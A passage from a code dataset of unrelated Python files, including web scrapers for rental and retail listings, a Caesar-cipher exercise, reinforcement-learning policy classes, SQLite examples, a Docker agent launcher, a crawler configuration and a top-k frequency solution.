BeautifulSoup\nimport pandas\n\n\nbaseUrl=\"http://sh.ziroom.com/z/nl/z2.html\"\nheaders={\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'\n}\n\ndef getHouse(url):\n try:\n house={}\n res=requests.get(url,headers=headers)\n soup=BeautifulSoup(res.text,'html.parser')\n title=soup.select(\".room_name h2\")[0].text.strip()\n address=soup.select(\"div[class='room_name'] span[class='ellipsis']\")[0].text.strip().replace(\" \",\"\").replace(\"\\n\",\"\")\n #price=soup.select(\"span[class='room_price']\")[0].text\n area=soup.select(\"ul[class='detail_room'] li\")[0].text.replace(\" \",\"\")[4:-1]\n face=soup.select(\"ul[class='detail_room'] li\")[1].text[4:]\n type=soup.select(\"ul[class='detail_room'] li\")[2].text.replace(\" \",\"\")[3:-3]\n floor=soup.select(\"ul[class='detail_room'] li\")[3].text[4:]\n around=soup.select(\"div[class='aboutRoom gray-6'] p\")[0].text[3:]\n traffic=soup.select(\"div[class='aboutRoom gray-6'] p\")[1].text[3:-1]\n house[\"标题\"]=title\n house[\"地址\"]=address\n #house[\"价格\"]=price\n house[\"面积\"]=area\n house[\"朝向\"]=face\n house[\"户型\"]=type\n house[\"楼层\"]=floor\n house[\"周边\"]=around\n house[\"交通\"]=traffic\n house[\"网址\"]=url\n return house\n except:\n print(\"error\")\n\ndef getHouses(start,end):\n houses=[]\n for j in range(start,end+1):\n print(\"开始爬取第\"+str(j)+\"页数据\")\n res=requests.get(\"http://sh.ziroom.com/z/nl/z2.html?p=\"+str(j),headers=headers)\n soup=BeautifulSoup(res.text,'html.parser')\n urls=soup.select(\"#houseList h3 a\")\n i=1\n for url in urls:\n print(\"开始爬取第\"+str(i)+\"条数据\")\n print(\"http:\"+url[\"href\"])\n houses.append(getHouse(\"http:\"+url[\"href\"]))\n print(\"爬取结束\")\n print(\"-\"*50)\n i+=1\n return houses\n\nprint(\"start\")\ndf=pandas.DataFrame(getHouses(1,50))\ndf.to_excel(\"d:/ziroom.xlsx\")\nprint(\"end\")\n\n","sub_path":"HLTH Speaker Webscripting/ziroom.py","file_name":"ziroom.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"94416289","text":"import json\r\nfrom urllib import request\r\nimport time\r\n\r\ndef encrypt(text,offset):\r\n result = []\r\n for i in list(text):\r\n result.append(chr(ord(i) + offset))\r\n return \"\".join(result)\r\n\r\ndef task_1():\r\n print(\"以下是任务一:凯撒加密\")\r\n str_input = input(\"请输入加密内容:\\n\")\r\n while True:\r\n if len(str_input) == 0:\r\n str_input = input(\"哥们,输入点东西呗~\")\r\n else:\r\n break\r\n\r\n print(\"请输入偏移量,默认为3(不输入使用默认,支持输入正负整数,输入0就没什么意思了)\")\r\n offset = 3\r\n while True:\r\n try:\r\n str_offset = input()\r\n if len(str_offset) != 0:\r\n offset = int(str_offset)\r\n break\r\n except Exception as e:\r\n print(\"输入整数,亲~\", e)\r\n print(\"经过加密,输出为:\", encrypt(str_input, offset))\r\n\r\ndef task_1_add():\r\n print(\"解密什么的,在原基础上修改偏移量正负数就好了 ^_^!\")\r\n\r\ndownload_progress = 0\r\ndef download_callback(blocknum, blocksize, totalsize):\r\n global download_progress\r\n download_now = (blocknum * blocksize * 10) / totalsize\r\n download_now = int(download_now)\r\n if download_now > download_progress:\r\n download_progress = download_now\r\n print(\"=\",end=\"\")\r\n if download_now == 10:\r\n print(\">\")\r\n\r\ndef task_2():\r\n #————关于Bing的每日一图,网上已经提供了接口,就不用抓包了————\r\n print(\"任务二:下载Bing的每日一图~~\") #使用自带的urllib就不用安装依赖了,虽然使用起来麻烦\r\n save_name = input(\"请输入图片名字,不使用则使用默认名字\\n\")\r\n if len(save_name) == 0:\r\n str_time = time.strftime(\"%Y-%m-%d\", time.localtime())\r\n save_name = \"Bing每日一图 \" + str_time + 
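The encrypt() in the test script above shifts raw code points, so 'z' + 3 leaves the alphabet entirely. A common Caesar variant that wraps within a-z / A-Z and passes other characters through — a different convention than the record's, shown for contrast:

def caesar(text, offset):
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - ord("a") + offset) % 26 + ord("a")))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - ord("A") + offset) % 26 + ord("A")))
        else:
            out.append(ch)  # digits, spaces, punctuation pass through
    return "".join(out)

print(caesar("xyz abc", 3))          # 'abc def' -- wraps past 'z'
print(caesar(caesar("hi", 5), -5))   # round-trips back to 'hi'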
\".jpg\"\r\n elif not save_name.endswith(\"jpg\"):\r\n save_name = save_name + \".jpg\"\r\n\r\n print(\"下载中……\")\r\n\r\n\r\n json_url = \"https://cn.bing.com/HPImageArchive.aspx?format=js&idx=0&n=1\"\r\n photo_url = \"https://cn.bing.com/th?id=OHR.Matamata_ZH-CN8111830275_1920x1080.jpg&rf=LaDigue_1920x1080.jpg&pid=hp\"\r\n\r\n while True:\r\n try:\r\n request.urlretrieve(photo_url, \"./\" + save_name, download_callback)\r\n\r\n data = request.urlopen(json_url).read()\r\n json_data = data.decode('utf-8')\r\n json_data = json.loads(json_data)\r\n break\r\n except Exception as e:\r\n print(\"下载失败!\")\r\n input(\"按任意键重试\")\r\n\r\n print(json_data[\"images\"][0][\"copyright\"])\r\n\r\nprint(\"这是后台第一轮考核的程序\")\r\ntask_1()\r\ntask_1_add()\r\nprint()\r\ntask_2()\r\nprint(\"任务结束~~~\")","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"559194253","text":"def get_policy(args, n_actions, rng):\n if args.policy_type == \"one_action\":\n return OneAction(args.action)\n elif args.policy_type == \"random_policy\":\n return RandomPolicy(n_actions, rng)\n elif args.policy_type == \"epsilon_greedy\":\n return EpsilonGreedy(n_actions, args.epsilon_start, args.epsilon_decay, args.epsilon_min, rng)\n else:\n raise ValueError(\"Unrecognized policy_type: {}\".format(args.policy_type))\n\n\nclass GreedyPolicy:\n @staticmethod\n def get_action(state, model):\n return model.get_output(state).argmax()\n\n\nclass EpsilonGreedy:\n def __init__(self, n_actions, epsilon_start, epsilon_decay, epsilon_min, rng):\n self.n_actions = n_actions\n self.epsilon_start = epsilon_start\n self.epsilon = self.epsilon_start\n self.epsilon_decay = epsilon_decay\n self.epsilon_min = epsilon_min\n if epsilon_decay != 0:\n self.epsilon_rate = (self.epsilon_start - self.epsilon_min) / self.epsilon_decay\n else:\n # epsilon = const\n self.epsilon_rate = 0\n\n self.rng = rng\n\n def get_action(self, state, model):\n if self.rng.rand() < self.epsilon:\n action = self.rng.randint(0, self.n_actions)\n else:\n action = model.get_output(state).argmax()\n self._decay()\n return action\n\n def _decay(self):\n self.epsilon = max(self.epsilon_min, self.epsilon - self.epsilon_rate)\n\n\nclass RandomPolicy:\n def __init__(self, n_actions, rng):\n self.n_actions = n_actions\n self.rng = rng\n\n def get_action(self, *args):\n return self.rng.randint(0, self.n_actions)\n\n\nclass OneAction:\n def __init__(self, action):\n self.action = action\n\n def get_action(self, *args):\n return self.action\n\n\nif __name__ == \"__main__\":\n pass\n","sub_path":"rl/policy.py","file_name":"policy.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"59357808","text":"import sqlite3\n\nconexion=sqlite3.connect(\"usuarios_autoincrement.db\")\ncursor=conexion.cursor()\n\ncursor.execute(\"\"\"\n SELECT * FROM usuarios WHERE edad=11\n \"\"\")\n#usuario=cursor.fetchone()\n#print(usuario)\n\nusuarios=cursor.fetchall()\nprint(usuarios)\n\nconexion.commit()\nconexion.close()\n","sub_path":"Fase 4 - Temas avanzados/Tema 14 - Bases de datos con SQLite/leccion3.py","file_name":"leccion3.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"44298988","text":"from plug_nozzle_angelino import plug_nozzle\nimport matplotlib.pyplot as plt\nimport numpy as 
+{"seq_id":"59357808","text":"import sqlite3\n\nconexion=sqlite3.connect(\"usuarios_autoincrement.db\")\ncursor=conexion.cursor()\n\ncursor.execute(\"\"\"\n SELECT * FROM usuarios WHERE edad=11\n \"\"\")\n#usuario=cursor.fetchone()\n#print(usuario)\n\nusuarios=cursor.fetchall()\nprint(usuarios)\n\nconexion.commit()\nconexion.close()\n","sub_path":"Fase 4 - Temas avanzados/Tema 14 - Bases de datos con SQLite/leccion3.py","file_name":"leccion3.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"44298988","text":"from plug_nozzle_angelino import plug_nozzle\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport aerospike_optimizer as ao \nimport gasdynamics as gd \nfrom scipy import interpolate\n\nr_e = 0.027 \nT_w = 600\nalpha = 1\nbeta = 1\ntruncate_ratio_init = 0.2\ndesign_alt_init = 9144 # 30 % greater\n\ntry:\n\topt_aero = ao.aerospike_optimizer(r_e,T_w,alpha,beta,design_alt_init,truncate_ratio_init,chr_mesh_n=120,no_alt_range = 30,no_core=1)\nexcept Exception:\n\t# opt_aero is needed below, so silently passing here would only defer the failure\n\traise\n#design diverging section, 20% truncation\n\nplug1 = opt_aero.spike_init\n\nplug1.define_compression(1.15/1000,4.51/1000,1,12.91/1000,10000)\n\nprint('Thrust = ' + str(plug1.calc_ideal_thrust(gd.standard_atmosphere([9144])[0])))\nprint('Throat area = ' + str(plug1.A_t))\nprint('Expansion ratio = ' + str(plug1.expansion_ratio))\n#plug1.plot_contour(plt)\n#plt.axis('equal')\n\n\ntck = interpolate.splrep(plug1.x,plug1.y)\n\n\nplt.plot(plug1.x,plug1.y,plug1.x,interpolate.splev(plug1.x,tck),'ro')\n\ninit_angle = np.arctan(interpolate.splev(plug1.x[0],tck,der=1))\n\nprint(\"initial angle: \" + str(init_angle*180/np.pi))\nplt.show()\n\nplug1.save_to_csv()\n","sub_path":"angelinoNozzle_py/test_plug_code.py","file_name":"test_plug_code.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"307746458","text":"#############################################################################\n#\n# PostgreSQL Enterprise Manager\n#\n# Copyright (C) 2015 - 2016, EnterpriseDB Corporation. All rights reserved.\n#\n# docker_agent.py - checks cluster status; ssh and scp functions are\n# defined.\n#\n#############################################################################\n\n\nimport subprocess\nimport os\nimport config\nfrom check_status import ssh_execute\n\n\n\ndef docker_agent(no_agent):\n\ttry:\n\t\tif ssh_execute(\"sudo systemctl start docker\" ) == 0:\n\t\t\tif ssh_execute(\"sudo docker build -t 'pem_agent' .\" ) == 0:\n\t\t\t\tif ssh_execute(\"sudo sh doc_agentlaunch.sh \"+str(config.FLOATING_IP)+\" centos 5432 pem_agent \"+str(no_agent) ) == 0:\n\t\t\t\t# if ssh_execute(\"sudo sh doc_agentlaunch.sh 172.16.253.230 centos 5432 pem_agent \"+str(no_agent) ) == 0:\n\t\t\t\t\tprint(\"Successfully built the docker container\")\n\t\t\t\t\treturn 0\n\n\texcept Exception as e:\n\t\tprint(\"Docker agent failed: {0}\".format(str(e)))\n\t\treturn 1\n\n\n\nif __name__ == '__main__':\n\tdocker_agent(config.NO_AGNET_CONTAINER)\n\n\n","sub_path":"openstack/docker_agent.py","file_name":"docker_agent.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"535784160","text":"#! /usr/bin/python\n###########################################################################\n# Copyright (C) 2018 Phani Vadrevu #\n# phani@cs.uno.edu #\n# #\n# Distributed under the GNU Public License #\n# http://www.gnu.org/licenses/gpl.txt #\n# #\n# This program is free software; you can redistribute it and/or modify #\n# it under the terms of the GNU General Public License as published by #\n# the Free Software Foundation; either version 2 of the License, or #\n# (at your option) any later version. 
#\n# #\n###########################################################################\nimport os\nHOME = os.getenv('HOME')\nCHROME_BINARY_PATH = os.path.join (HOME, \"chrome_binary/\") # The path of the binary\nMAIN_LOG_PATH = os.path.join(HOME, \"se-hunter/logs/\")\nSCREENSHOTS_DIR = \"screenshots\"\nSEHUNTER_LOGS_DIR = \"sehunter_logs\"\nJSGRAPH_LOGS_DIR = \"jsgraph_logs\"\nCHROMEDRIVER_LOGS_DIR = \"chromedriver_logs\"\nCHROMEDATA_DIR = \"chrome_data\"\nDOWNLOADS_DIR = \"downloads\"\nRAW_DOWNLOADS_DIR = \"downloads/raw\"\nHTML_LOGS_DIR = \"html_logs\"\nAD_OBJECTS_DIR = \"ads\"\nAD_CHAIN_PROCESS_LOG = 'ad_chain_process.log'\n\nFILE_SERVER = \"uname@server\"\nFILE_SERVER_RESIDENTIAL = \"uname@server\"\n\nRESIDENTIAL_SEEDS = ['apu_php.txt']\nRES_JOBS_FILE = \"residential_list.txt\"\nNONRES_JOBS_FILE = \"non_residential_list.txt\"\n\nOBSOLETE_PROCESS_AGE = 100 # Kill orphan processes older than x seconds.\n\nMIN_CHROME_DEBUG_PORT = 10000\nMAX_CHROME_DEBUG_PORT = 40000\n\nUSER_AGENTS = {\n # Emulate a 1920x1080 (1785,993) desktop; Other variant: 1440x900 (1375,738-win_size_cmd)\n \"chrome_mac\": {\n \"user_agent\": ('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_0) '\n 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36'),\n \"window_size_cmd\": (1785, 993),\n \"device_size\": (1920, 1080),\n \"device_scale_factor\": 1,\n \"mobile\": False,\n },\n\n \"ie_win\": {\n \"user_agent\": ('Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0)'),\n \"window_size_cmd\": (1785, 993),\n \"device_size\": (1920, 1080),\n \"device_scale_factor\": 1,\n \"mobile\": False,\n\n },\n\n \"edge_win\": {\n \"user_agent\": ('Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 '\n '(KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246'),\n \"window_size_cmd\": (1785, 993),\n \"device_size\": (1920, 1080),\n \"device_scale_factor\": 1,\n \"mobile\": False,\n },\n\n # Samsung Galaxy S9 Plus; personal test: win size: (412, 718); 1440 * 2960 is the screen size;\n # win size From: https://mediag.com/news/popular-screen-resolutions-designing-for-all/ (360, 740)\n # Also here: https://www.mydevice.io/#compare-devices\n \"chrome_android\": {\n \"user_agent\": ('Mozilla/5.0 (Linux; Android 8.0.0; SM-G965F Build/R16NW) AppleWebKit/537.36 '\n '(KHTML, like Gecko) Chrome/65.0.3325.109 Mobile Safari/537.36'),\n \"window_size_cmd\": (360, 740),\n #\"device_size\": (1440, 2960),\n \"device_size\": (360, 740),\n \"device_scale_factor\": 4,\n \"mobile\": True,\n\n }\n\n}\n","sub_path":"code/crawling/log_parsing/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"370681066","text":"from SimpleCV import Camera, Display, Image, Color\n\n\ndef checkCircle(img, color):\n\n yellowDist = img.colorDistance(color)\n yellowBin = yellowDist.binarize(50)\n\n circles = yellowBin.findCircle(canny = 10, thresh = 10, distance = 15)\n\n #yellowBin.show()\n\n if not circles:\n return False\n else:\n return True\n\nimg = Image('1.png')\n\n\ndist = img.colorDistance((161, 171, 182))\nbina = dist.binarize()\nmorphed = bina.morphOpen()\n\ninv = bina.invert()\n\nb = morphed.findBlobs()\nobj = b[0].blobImage()\n\nd = obj.show()\n\n#d = bina.morphOpen().show()\n\n#holes = inv.findBlobs()\n\n'''\nholes = img.findBlobs()\n\ni = 1\nfor hole in holes:\n print(str(i))\n if hole.isCircle(0.41):\n print('Hole found!')\n d = hole.hullImage().show()\n i += 
1\n\nprint(holes)\n'''\n\n#print(holes[0].isCircle(0.41))\n\n#d = holes[0].hullImage().show()\n\n'''\n#d = holes[0].hullImage().show()\n\nd = holes[0].getFullMaskedImage().show()\nd = (inv - holes[0].getFullMaskedImage()).show()\n'''\n\n#d = bina.show()\n\n'''\nif checkCircle(img, (156.0, 151.0, 34.0)):\n print('Found a yellow circle!')\nelse:\n print('Didn\\'t find a yellow circle :(')\n'''\n\n#yellowDist = img.colorDistance((156.0, 151.0, 34.0))\n#yellowBin = yellowDist.binarize(50)\n\n\n#yellowBin.show()\n\n#d = (img - yellowBin).show()\n\n\n#circles = yellowBin.findCircle(canny = 10, thresh = 10, distance = 15)\n\n#circles.draw(width=4, color= Color.RED)\n#d = yellowBin.show()\n#d = circles[0].show(color = Color.RED)\n\n#print(circles)\n\n#inv.show()\n\n'''\ncircles = inv.findCircle(canny=50,thresh=50,distance=15)\n\nprint(circles)\n\ncircles.draw(width=4)\n\ncircles[0].draw(color=Color.RED, width=4)\n\nd = inv.show()\n'''\n\n#d = inv.dilate().findCorners(maxnum=6, mindistance=30).show()\n#d = inv.show()\n","sub_path":"app/images/detect_piece.py","file_name":"detect_piece.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"316624911","text":"import re\n\n\ndef contains(whole_text, subpart):\n whole_text = normalize_string(whole_text)\n subpart = normalize_string(subpart)\n try:\n return subpart in whole_text\n except TypeError:\n # e.g. one side is not a string; the original bare except hid real errors\n return False\n\n\ndef assert_contains(whole_text, subpart):\n whole_text = normalize_string(whole_text)\n subpart = normalize_string(subpart)\n # assert directly; the original try/except that re-raised as a bare `assert False` only obscured the failure\n assert subpart in whole_text\n\n\ndef normalize_string(string):\n string = string.lstrip().rstrip().lower()\n string = re.sub('[,£$!<>""]', '', string)\n return string","sub_path":"support/string_helper.py","file_name":"string_helper.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"151283370","text":"# -*- coding: utf-8 -*-\n#kaggle house-prices-advanced-regression-techniques\nfrom scipy import *\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import OneHotEncoder\nimport warnings\nimport time\n\nwarnings.filterwarnings('ignore')\n\nSTARTTIME = time.time()\n\ndirectory = \"/Users/yumi/Documents/house-prices-advanced-regression-techniques/\"\n\nTRAIN = pd.read_csv(directory+'train.csv')\nTEST = pd.read_csv(directory+'test.csv')\n\nX = TRAIN.copy()\ny = TRAIN['SalePrice']\nX.drop('Id',axis=1,inplace=True)\nX.drop('SalePrice',axis=1,inplace=True)\nprint(\"shape(X): {}, shape(y): {}\".format(shape(X),shape(y)))\n\ndtype_list = array([X[x].dtype for x in X.columns])\nwant_1 = dtype_list == \"float64\"\nwant_2 = dtype_list == \"int64\"\ncols = X.columns[want_1 + want_2]\n\nX = X[cols]\n#X.dropna(axis = 1, inplace = True)\nX.fillna(value = 0, inplace = True) #no dropping allowed!\nprint(\"shape(X): {}, shape(y): {}\".format(shape(X),shape(y)))\n\nX_train, X_test, y_train, y_test = train_test_split(X, y)\n\nlogreg = LinearRegression()\nlogreg.fit(X_train, y_train)\ny_pred = logreg.predict(X_test)\nprint(\"Linear Regression R^2: {}\".format(logreg.score(X_test, y_test))) # .score() is R^2 for regressors, not accuracy\n\nprint(\"Time elapsed; {:.2f}s\".format(time.time()-STARTTIME))\n\nRRR = RandomForestRegressor()\nRRR.fit(X_train, y_train)\ny_pred = RRR.predict(X_test)\nprint(\"Random Forest R^2: {}\".format(RRR.score(X_test, y_test)))\n\ncoeff = logreg.coef_ / max(abs(logreg.coef_))\nfeat_imp = RRR.feature_importances_ / max(abs(RRR.feature_importances_))\nplt.plot(coeff,\"-ko\")\nplt.plot(feat_imp,\"-r*\")\nplt.legend([\"LinReg\",\"RdmFst\"])\nplt.grid(\"on\")\nplt.show()\n\nprint(\"Time elapsed; {:.2f}s\".format(time.time()-STARTTIME))","sub_path":"house_prices.py","file_name":"house_prices.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} 
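Note that .score() on scikit-learn regressors is the R^2 coefficient, while the House Prices competition above is judged on RMSLE (root mean squared error between log prices). A small sketch of that metric, reusing arrays shaped like the y_test / y_pred in the script above:

import numpy as np

def rmsle(y_true, y_pred):
    # root mean squared log error: RMSE of log1p-transformed targets
    y_pred = np.maximum(y_pred, 0)  # guard against negative predictions before taking the log
    return np.sqrt(np.mean((np.log1p(y_true) - np.log1p(y_pred)) ** 2))

# e.g. rmsle(y_test, RRR.predict(X_test))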
+{"seq_id":"38395395","text":"import pandas as pd\nimport hdf\nsigs = hdf.read(r\"C:\\Users\\evans\\Dropbox\\Shade\\raw\\sigs.h5\")[0]\nsigs['Name2'][0]\nseed = pd.read_csv(r'C:\\Users\\evans\\Dropbox\\Shade\\database\\seed.txt', sep='\\t', index_col=0)\nseed.columns\nseed_sig = pd.DataFrame()\nfor i in sigs.index:\n temp = seed.loc[seed['genotype'].str.contains(sigs.loc[i, 'Name2'])]\n if not temp.empty:\n temp['anno'] = sigs.loc[i, 'Annotations']\n temp['gene'] = sigs.loc[i, 'Name2']\n seed_sig = pd.concat([seed_sig, temp])\n\nseed_sig.to_csv(r'C:\\Users\\evans\\Dropbox\\Shade\\database\\seed_sig.csv')\n","sub_path":"seed.py","file_name":"seed.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"196232542","text":"from datetime import datetime\nfrom dateutil.relativedelta import relativedelta\n\n\"\"\" now = datetime.now()\nyesterday = now.date() - relativedelta(days=10)\nprint(yesterday) \"\"\"\n\n\ndef filter_time(df, days=0):\n last_day = df.index[0].date()\n start_day = last_day - relativedelta(days=days)\n # sort_index() - skips a warning\n df = df.sort_index().loc[start_day:last_day]\n return df\n","sub_path":"L5-stockdash_teacher_alongs/L5.2-dashboard/time_filtering.py","file_name":"time_filtering.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"379230988","text":"# Given a non-empty integer array, return the k most frequent elements. \n# \n# \n# \n# Example 1: \n# \n# Input: nums = [1,1,1,2,2,3], k = 2\n# Output: [1,2]\n# \n# \n# Example 2: \n# \n# Input: nums = [1], k = 1\n# Output: [1] \n# \n# \n# \n# Constraints: \n# \n# \n# You may assume k is always valid, 1 ≤ k ≤ the number of distinct elements in the array. \n# Your algorithm's time complexity must be better than O(n log n), where n is the array's size. \n# The answer is guaranteed to be unique; in other words, the set of the k most frequent elements is unique. \n# You may return the answer in any order. \n# \n# Related Topics: Heap, Hash Table \n# 👍 441 👎 0\n\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\n\n# definitely not the fastest approach, but good practice with heaps\nclass Solution:\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n from collections import Counter\n import heapq as hq\n lookup = Counter(nums)\n res = []\n heap = []\n for num, freq in lookup.items():\n # if the heap is already full (k elements)\n if len(heap) == k:\n # evict the lowest-frequency tuple\n if heap[0][0] < freq:\n hq.heapreplace(heap, (freq, num))\n else:\n hq.heappush(heap, (freq, num))\n while heap:\n res.append(hq.heappop(heap)[1])\n\n return res\n\n# leetcode submit region end(Prohibit modification and deletion)\n","sub_path":"Week_02/[347]前 K 个高频元素.py","file_name":"[347]前 K 个高频元素.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} 
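For reference, the top-k query that the heap solution above implements by hand can also be expressed with the standard library; heapq.nlargest keeps a k-sized heap internally, so both run in O(n log k):

from collections import Counter
import heapq

def top_k_frequent(nums, k):
    counts = Counter(nums)
    return heapq.nlargest(k, counts.keys(), key=counts.get)

print(top_k_frequent([1, 1, 1, 2, 2, 3], 2))  # [1, 2]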
+{"seq_id":"36412531","text":"from cister.db.views import BaseCisterView\nfrom cister.db.models.cister import DBSession, Fleet\n\nclass FleetView(BaseCisterView):\n\n def __init__(self, request):\n self.request = request\n\n def __call__(self):\n dbsession = DBSession()\n returnvalue = {}\n returnvalue.update(self.request.matchdict)\n fleetid = returnvalue.get('fleetid')\n\n fleet = dbsession.query(Fleet).filter(Fleet.id==fleetid).one()\n\n returnvalue['fleet'] = fleet\n\n return returnvalue\n","sub_path":"cister/db/views/fleet/show.py","file_name":"show.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"517762771","text":"import numpy as np\nimport cv2\n\ncap=cv2.VideoCapture(0)\n\n#fourcc = cv2.VideoWriter_fourcc(*'XCID')\n#out= cv2.VideoWriter('output.avi', fourcc, 20.0, (640,480))\nout = cv2.VideoWriter('/media/sdcard/timer.avi',cv2.cv.CV_FOURCC('M','J','P','G'), 6.3, (640,480))\n#out = cv2.VideoWriter('output.avi', -1, 20.0, (640,480))\n\n#while(cap.isOpened()):\nfor i in range(1,100):\n\tret, frame = cap.read()\n\tif ret:\n\t\ti=i+1\n\t\tout.write(frame)\n\n#\t\tcv2.imshow('Video Stream', frame)\n\n\telse:\n\t\tbreak\n\ncap.release()\nout.release()\ncv2.destroyAllWindows() \n\n\n\n\n\n","sub_path":"VideoTesting/VideoCapture.py","file_name":"VideoCapture.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"417072376","text":"\"\"\"Neiman Marcus page scraper\"\"\"\nfrom price_dig import PageParser, PageScrapper\n\nPARSER_OPTIONS = [{\n 'name': 'product_name',\n 'keyword': {\n 'class': 'product-name'\n }\n}, {\n 'name': 'description',\n 'keyword': {\n 'class': \"productCutline\"\n }\n}, {\n 'name': 'product_img',\n 'keyword': {\n 'class': \"img-wrap\"\n }\n}, {\n 'name': 'product_price',\n 'keyword': {\n 'class': \"product-price\"\n }\n}]\n\n\nclass NeimanMarcusParser(PageParser):\n \"\"\"parser for Neiman Marcus pages\"\"\"\n def __init__(self, url):\n super(NeimanMarcusParser, self).__init__(url, options=PARSER_OPTIONS)\n\n\nclass NeimanMarcusScrapper(PageScrapper):\n \"\"\"scraper class for Neiman Marcus\"\"\"\n def __init__(self, url):\n super(NeimanMarcusScrapper, self).__init__(url, parser=NeimanMarcusParser)\n","sub_path":"neimanmarcus.py","file_name":"neimanmarcus.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"220938204","text":"n = 100\nsum = 0\nstart = 1\nwhile start <= n:\n sum = sum + start\n n -= 1\n # print(n)\n # print(sum)\nelse:\n print(n)\n# flag = 1\n# while (flag): print ('helloworld!')\n# print (\"Good bye!\")\n\nimport random\n# random number num for the dice roll\nnum = random.randint(1,6)\n# # read a guessed number\ntemp = input(\"Enter an integer: \")\nguess_num = int(temp)\n\nwhile guess_num != num:\n if guess_num > num and guess_num < 7:\n print(\"Too big\")\n if guess_num > 6:\n print(\"Silly, the maximum is only 6\")\n if guess_num < num:\n print(\"Too small, keep guessing\")\n temp = input(\"Guess again: \")\n guess_num = int(temp)\n# guessed right, the game is over\nprint(\"You got it, game over\")","sub_path":"gachascripts/day03/while.py","file_name":"while.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"178281770","text":"\"\"\"movieproject2 URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. 
Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom movies import views\nfrom movies.user_decorator import login_requied\n\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^login/$', views.Login, name=\"login\"),\n url(r'^register/$', views.Register, name=\"register\"),\n url(r'^main/$',views.MainPage,name=\"main\"),\n url(r'^checkusername/$',views.check_username,name=\"checkname\"),\n url(r'^$',views.IndexPage,name=\"indexpage\"),\n\n url(r'^mylike/$',views.MylikePage,name=\"mylike\"),\n url(r'^dellike/$',views.DellikePage,name=\"dellike\"),\n url(r'^like/$',views.LikePage,name=\"like\"),\n\n url(r'^logout/$',views.Logout,name=\"logout\"),\n\n]\n","sub_path":"movieproject2/movieproject2/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"264819378","text":"# -*- coding: utf-8 -*- \r\nfrom Cheetah.Template import Template\r\nimport sys\r\nimport os\r\nimport shutil\r\nimport json\r\nimport gettext\r\n\r\ndef GetConf(conf,inputs,outputs):\r\n\toutputs[\"Result\"][\"value\"]=\"\";\r\n\ti = 